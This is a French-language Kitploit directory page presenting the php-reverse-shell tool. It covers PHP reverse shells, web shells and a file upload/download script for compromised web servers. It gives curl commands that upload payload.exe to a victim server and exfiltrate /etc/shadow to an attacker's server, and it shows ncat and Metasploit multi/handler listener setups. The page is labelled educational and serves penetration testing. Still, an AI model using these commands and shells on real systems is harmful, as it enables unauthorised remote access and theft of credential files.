Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
php-reverse-shell — Shells PHP fonctionnant sur Linux, macOS et Windows. | Kitploit
Outils/GitHubGitHub/ivan-sincek/php-reverse-shell
ExploitationExploitation d'Applications WebPost-ExploitationTests d'IntrusionApprentissage et ÉducationRed TeamingOutil d'Accès à Distance
GitHubivan-sincek/php-reverse-shell

php-reverse-shell

Shells PHP fonctionnant sur Linux, macOS et Windows.

Voir le dépôt
571160il y a 5 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PHP Reverse Shell

Une petite mise à jour du célèbre script PHP reverse shell pentestmonkey/php-reverse-shell. Crédits à l'auteur original !

Fonctionne sur Linux et macOS avec /bin/sh et sur Windows avec cmd.exe. Le script détectera automatiquement le système d'exploitation sous-jacent.

Fonctionne avec ncat et multi/handler.

Testé sur :

  • XAMPP pour Linux v7.3.19 avec PHP v7.3.19 sur Kali Linux v2020.2 (64 bits),
  • XAMPP pour OS X v7.4.10 avec PHP v7.4.10 sur macOS Catalina v10.15.6 (64 bits),
  • XAMPP pour Windows v7.4.3 avec PHP v7.4.3 sur Windows 10 Enterprise (64 bits),
  • Image Docker nouphet/docker-php4 avec PHP v4.4.0,
  • Image Docker steeze/php52-nginx avec PHP v5.2.17.

Les canaux de processus sous Windows ne prennent pas en charge les opérations asynchrones, donc stream_set_blocking(), stream_select() et feof() ne fonctionneront pas correctement, mais j'ai trouvé une solution de contournement.

Conçu à des fins éducatives. J'espère que cela vous sera utile !

Table des matières

  • Reverse Shells
  • Web Shells
  • Script d'upload/download de fichiers
    • Cas 1 : envoyer le script sur le serveur de la victime
    • Cas 2 : envoyer le script sur votre serveur
  • Configurer un écouteur
  • Images

Reverse Shells

/src/reverse/php_reverse_shell.php nécessite PHP v5.0.0 ou supérieur.

/src/reverse/php_reverse_shell_older.php nécessite PHP v4.3.0 ou supérieur.

Modifiez l'adresse IP et le numéro de port dans les scripts si nécessaire.

Copiez /src/reverse/php_reverse_shell.php dans le répertoire racine web de votre serveur (par ex. dans /opt/lampp/htdocs/ sur XAMPP) ou envoyez-le sur le serveur web de votre cible.

Accédez au fichier avec votre navigateur web préféré.

Web Shells

Consultez le simple web shell PHP basé sur une requête HTTP POST.

Consultez le simple web shell PHP basé sur une requête HTTP GET. Vous devez encoder vos commandes en URL.

Consultez le simple web shell PHP v2 basé sur une requête HTTP GET. Vous devez encoder vos commandes en URL.

Script d'upload/download de fichiers

Consultez le script PHP simple d'upload/download de fichiers basé sur une requête HTTP POST pour l'upload de fichiers et une requête HTTP GET pour le téléchargement de fichiers.

Lors du téléchargement d'un fichier, vous devez encoder le chemin du fichier en URL.

Selon la configuration du serveur, le téléchargement d'un fichier via le paramètre de requête HTTP GET peut ne pas toujours fonctionner ; dans ce cas, vous devrez coder en dur le chemin du fichier dans le script.

Cas 1 : envoyer le script sur le serveur de la victime

Accédez au script sur le serveur web de la victime avec votre navigateur web préféré, ou utilisez cURL depuis votre PC.

Envoyez un fichier vers le répertoire racine web du serveur depuis votre PC :

root@kitploit:~
curl -skL -X POST https://victim.com/files.php -F file=@/root/payload.exe

Téléchargez un fichier du serveur vers votre PC :

root@kitploit:~
curl -skL -X GET https://victim.com/files.php?file=/etc/shadow -o shadow

Si vous avez élevé vos privilèges initiaux dans votre reverse shell, ce script peut ne pas avoir les mêmes privilèges que le shell. Dans ce cas, pour télécharger un fichier spécifique, vous devrez peut-être copier le fichier dans le répertoire racine web et définir les permissions de lecture nécessaires.

Cas 2 : envoyer le script sur votre serveur

Depuis votre reverse shell PHP, exécutez les commandes cURL suivantes.

Envoyez un fichier depuis le PC de la victime vers le répertoire racine web de votre serveur :

root@kitploit:~
curl -skL -X POST https://my-server.com/files.php -F file=@/etc/shadow

Téléchargez un fichier depuis le répertoire racine web de votre serveur vers le PC de la victime :

root@kitploit:~
curl -skL -X GET https://my-server.com/files.php?file=/root/payload.exe -o payload.exe

curl -skL -X GET https://my-server.com/payload.exe -o payload.exe

Configurer un écouteur

Pour configurer un écouteur, ouvrez la console de votre choix sur Kali Linux et exécutez l'un des exemples ci-dessous.

Configurez un écouteur ncat :

root@kitploit:~
ncat -nvlp 9000

Configurez un écouteur multi/handler :

root@kitploit:~
msfconsole -q

use exploit/multi/handler

set PAYLOAD windows/shell_reverse_tcp

set LHOST 192.168.8.185

set LPORT 9000

exploit

Images

Ncat

Figure 1 - Ncat

Dump du script

Figure 2 - Dump du script

Télécharger l’outil